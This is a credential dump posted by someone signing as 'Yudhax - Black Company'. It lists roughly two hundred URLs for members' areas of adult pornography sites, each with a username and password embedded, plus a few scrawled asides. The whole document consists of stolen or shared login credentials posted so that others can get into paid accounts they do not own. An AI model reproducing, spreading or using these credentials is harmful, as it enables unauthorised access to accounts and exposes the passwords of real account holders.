http://zr1toys:202556@members.truecelebs.com/restricted/
http://58622442:steve010@members.analboytoys.com/
http://dmibear:dmitry@members.oxpass.com/
http://byers1:joanchen@members.oxpass.com/
http://tshimamoto2001:664349@members.oxpass.com/
http://vjsjes:105210@members.oxpass.com/
http://cerebus:pope@members.truecelebs.com/restricted/
http://love:buster@abc-gallery.com/members/
http://sarsakar:babylon5@sheerfinesse.com/members/
http://jester65:babylon@www.truexxxposure.com/members/directory.htm
http://babylon02:naptime@wasteland.com/paul2851/
http://dakman:secret1@babylonxxx.com/members/
http://DavidJ:David@www.babylonxxx.com/members/
http://davidt85:rachel@www.babylonxxx.com/members/
http://vzr33ecp:cnf22pj@members.videosz.com/
http://Daniel1:school@www.ageticket.com/members/index.cgi?1000024
http://candyian:iancandy@members.bukkakeschool.com
http://woodside:school10@www.amyroped.com/memberreal/members.htm
http://stalker6:maddog@members.bukkakeschool.com
http://javajava:badboy@www.hornyhoundogs.com/hhd_members/
http://javajava:badboy@www.allcandid.com/members/index.html
http://cuppajava:oda121@amateurallure.com/members/home.html
http://madjava:asshole@www.angiexxx.com/members/
http://javajoe8282:wizard82@members.netvideogirls.com/members/vfiles/index.html
http://81chevy:bigdaddy@members.milfriders.com/full
http://petehaines:nova@members.milfriders.com/full
http://selifx:mulder@members.milfriders.com/full
http://tommyf1:f0cus1@members.milfriders.com/full
http://meteu121:nesabsa@members.milfriders.com/full
http://amontgo:avaindia@members.celebtaboo.com/members/
http://coach101:indiana@members.celebtaboo.com/members/index.phtml
http://motormole:moleman1@10000sweetblossoms.com/patrons/blossoms/pixb05/reya151.jpg
http://thegil:773413@supercult.com/members/girls2/ana/meetana/p7180398.jpg
http://wheaties903:lindo@www.interactive-cartoons.com/members/welcome.htm
http://tornado1:windows1@members.amateuravenue.com/
http://stevenfx:windows@amateursexphoto.com/members/index.html
http://Window:come@twinpeaks69.com/members/
http://stevenfx:windows@www.backdoorgirl.com/members/index.html
http://windows:112233@www.atlanticass.com/private/
http://windows:112233@www.formerfucks.com/members/index.html
http://windows:version@www.wassa.net/members/index.html
http://stevenfx:windows@www.asian-girl-erotica.com/members/index.html
http://windows:112233@www.homofantasy.com/members/index.html
http://stevenfx:windows@lesbiangirl.com/members/
http://windows:112233@www.mpgpage.com/members/
http://stevenfx:windows@girlswholovepussy.com/members/
http://windows:112233@www.shymodels.com/members/index.html
http://stevenfx:windows@www.amateurgynecologist.com/members/index.html
http://tornado1:windows1@www.solarotica.com/smembers/enter.htm
http://stevenfx:windows@world-premiere.com/members/index.html
http://windows:112233@www.upskirtass.com/members/
http://fusarpao:selene@nylonhell.com/members/
http://crusader:sup_wolf@aamesummers.com/members/
http://hayabusa:alicia@www.thickjuicycocks.com/members/index.html
http://crusader:sup_wolf@aamesummers.com/members/index.html
http://tamaki:14vbqk9p@www.usagigoya.com/member/member.htm
http://benton:susan@all-erotica.com/members/index.html
http://valentin:hayabusa@daily-desktops.com/members/
http://usarmy:private@altniche.com//members/
http://hortusdave:garden1@www.asspoundinghunks.com/members/index.html
http://talisman200:garden@www.clubstroke.net/members/
http://anselm1:garden48@wasteland.com/paul2851/ad3912.htm
http://wooden:garden@members.seeasians.com/
http://blanco:gacho@www.seeasians.com/members/index.html
http://ryan22:muster@members.seeasians.com/
http://g1mpnuts:69696969@www.seeasians.com/members/index.html
http://ryan22:muster@members.seeasians.com/
http://rich0215:seeasian@www.seeasians.com/members/index.html
http://ICEMAN:01452@members.seeasians.com/
http://TedYiu:password@members.seeasians.com/
http://ryan22:muster@members.seeasians.com/
http://fredfred:derfderf@sextoon.com/sextoonvip/welcome.html
http://johnny1:isvipebaby@members.ebonygirlsonline.com/
http://blades:pedros@www.sextoon.com/sextoonvip/welcome.html
http://hunter-divx:hunter-d@eroticsmoking.com/members/
http://bagworm:firefox@absolutefacials.com/members/
http://oxipy:30325@adraianaventis.com/members/
http://allison:allison@4bareness.com/members/index.html
http://morph9:fungus@216.130.213.58/members/index.phtml
http://oldtar:azsailor@ajay4fun.com/gallery/
http://johnking:theduke@ajay4fun.com/members/
http://funkyfunky:yeah11@altniche.com/members/
http://siadewalk:surfer@members.18teenlive.com/full/
http://dental:cosme8@members.18teenlive.com/full/
http://thomas:bird@members.18teenlive.com/full/
http://barfolot:bman729@members.18teenlive.com/full/
http://OEH213MK:NSO726VL@members.18teenlive.com/full/
http://Jumte:mayofl@members.18teenlive.com/full/
http://allsmp7:memento@www.babylonxxx.com/members/
http://babylon02:naptime@wasteland.com/paul2851/
http://allyours:sexy@www.babylonxxx.com/members/
http://babylon02:naptime@wasteland.com/paul2851/ad3912.htm
http://alzzy40:snickers@www.babylonxxx.com/members/
http://arch:2002@www.babylonxxx.com/members/
http://ddj5:love@www.babylonxxx.com/members/
http://aug12:colon@www.babylonxxx.com/members/
http://dentman:dentist@www.babylonxxx.com/members/
http://b3895a:f3gh65@www.babylonxxx.com/members/
http://dmc4u2:horney@www.babylonxxx.com/members/
http://b3895w:f3gh65@www.babylonxxx.com/members/
http://dmc4u2:horney@www.babylonxxx.com/members/
http://b3895wd:f3gh65@www.babylonxxx.com/members/
http://enjoy:it@www.babylonxxx.com/members/
http://b3895wd4:f3gh65@www.babylonxxx.com/members/
http://fdhfdh44a:sadsad32@www.babylonxxx.com/members/
http://b389a65:f3gh65@www.babylonxxx.com/members/
http://ForCK:FromV@www.babylonxxx.com/members/
http://bes555:icetea@www.babylonxxx.com/members/
http://gman:1234@www.babylonxxx.com/members/
http://bezo:Gooo@www.babylonxxx.com/members/
http://godrock:135791@www.babylonxxx.com/members/
http://3000:crewcom@www.blondenurses.com/members/
http://andy852:luvbekki@blondenurses.com/members/
http://33100:00133@www.blondenurses.com/members/
http://asdf:asdf@blondenurses.com/members/
http://3722:6591@www.blondenurses.com/members/
http://4304299:428054@blondenurses.com/members/
http://445566:665544@www.blondenurses.com/members/
http://33100:00133@blondenurses.com/members/
http://447755:557744@www.blondenurses.com/members/
http://alan:adams@blondenurses.com/members/index.html
http://solpot:homo@playboy.com/members/index.html
http://forxxxhq:birthday2@coedflashers.com/members/
http://itsalright:ifyawantme@www.coedflashers.com/members/
http://forxxxhq:birthday99@coedflashers.com/members/
http://igotda:vette@www.coedflashers.com/members/
http://rsalinas:nemrac58@coedflashers.com/members/index.html
http://girl78:78girl@coedflashers.com/members/
http://innocent:desires@coedflashers.com/members/
http://dvc60:741852@www.coedflashers.com/members/
http://033314:320033@www.coedflashers.com/members/
http://jason:jason@coedflashers.com/members/
http://1234:1234@coedflashers.com/members/index.html
http://jessica3:425mb@coedflashers.com/members/
http://123456:654321@coedflashers.com/members/
http://john:john@coedflashers.com/members/
http://hotystud:facelift@www.blackpornpics.com/members/index.html
http://madarab:shift123@blackpornpics.com/members/index.html
http://charlesw0:casamm69@www.blackpornpics.com/members/
http://peabody:103190@blackpornpics.com/members/index.html
http://galpo9:chocha10@www.blackpornpics.com/members/
http://erick:aguilar@www.blackpornpics.com/members/
http://JAYGOMEZ:WINTONBOY@www.blackpornpics.com/members/
http://ginyusan:desire@www.blackpornpics.com/members/
http://rickyv:cowzone@www.blackpornpics.com/members/
http://hotdoz:llokkj@www.blackpornpics.com/members/
http://dkimmerly1:1wrestle@members.clubjenna.com/
http://jokeller:july0476@members.clubjenna.com/
http://bigwilly:baseball@members.clubjenna.com/
http://xtreme469:aerosmit@members.clubjenna.com/
http://wespullman:swordfis@members.clubjenna.com/
http://alkandarib1:metalgear1@prv.sexyasses.adultbouncer. com/
http://oblabroad:6RVYya4N@prv.sexyasses.adultbouncer.com/
http://hornybob69:YF22UyY8@prv.sexyasses.adultbouncer.com
http://hornybob69:YF22UyY8@prv.sexyasses.adultbouncer.com/
http://ztv36saz:hta4227@members.ztod.com
http://ztw68rxa:hpu24ea@members.ztod.com
http://ztp62z4z:htf788c@members.ztod.com
http://ztp57ias:wxir4f3@members.ztod.com
http://zty63sso:twomefb@members.ztod.com
http://ztk42iet:svr8p8a@members.ztod.com
http://ztd47mvm:qptemb7@members.ztod.com
http://ztf25p3v:ffq1rj9@members.ztod.com
http://ztd27pe3:jouwaed2@members.ztod.com
http://ztz55ke5:triodas3@members.ztod.com
http://ztw655dr:sleadew7@members.ztod.com
http://ztq728q4:cpjmf6a@members.ztod.com
http://zte64x28:hmd196j@members.ztod.com
http://ztp42mqx:nxy59ff@members.ztod.com
http://ztr66mtm:jzjmc4a@members.ztod.com
http://janhurak:123456@members.clubjenna.com/
http://gawker:clevelan@members.clubjenna.com/
http://wetinaminute:michelle@members.clubjenna.com/
http://baerwald:roland@members.clubjenna.com/
http://central:rusty1@members.clubjenna.com/
http://kenobi24:padawan@members.clubjenna.com
http://gawker:clevelan@members.clubjenna.com/
For GAY sometime u must change u Channel TV to Lesbian Site
http://jimmys:hangout@www.lesbiansorority.com/members/
http://mtcon:mtcon@lesbiansorority.com/members/
http://girl78:78girl@www.lesbiansorority.com/members/
http://ellen:john77@lesbiansorority.com/members/index.html
http://link:dv123@lesbiansorority.com/members/index.html
http://eminiem:dirtybas@lesbiansorority.com/members/index.html
http://forxxxhq:birthday299@www.lesbiansorority.com/members/
http://eminiem:dirtybastard@lesbiansorority.com/members/index.html
http://password:password2003@lesbiansorority.com/members/index.html
http://eminiem:dirtybastard99@lesbiansorority.com/members/index.html
http://dowjones:stockman46@lesbiansorority.com/members/index.html
http://eminiem:dirtybastard99@lesbiansorority.com/members/index.html
http://gvd900:gvd900@www.mpgpage.com/members/
http://jason:jason@mpgpage.com/members/
http://big1:big1@mpgpage.com/members/
http://0037:pb351@www.mpgpage.com/members/
http://033314:320033@www.mpgpage.com/members/
http://asdf:asdf@mpgpage.com/members/
Cartoon
http://lam6239:connor@www.interactive-cartoons.com/members/welcome.htm
http://candyman84:candy@www.interactive-cartoons.com/members/welcome.htm
http://polako:hellomot@www.interactive-cartoons.com/members/welcome.htm
http://Wnaqwg:BhUpqg@www.interactive-cartoons.com/members/welcome.htm
http://geocities.com/kimpetku/index

-----------------
Dont thinking about me .... be your self bro..
-----------------

Yudhax - Black Company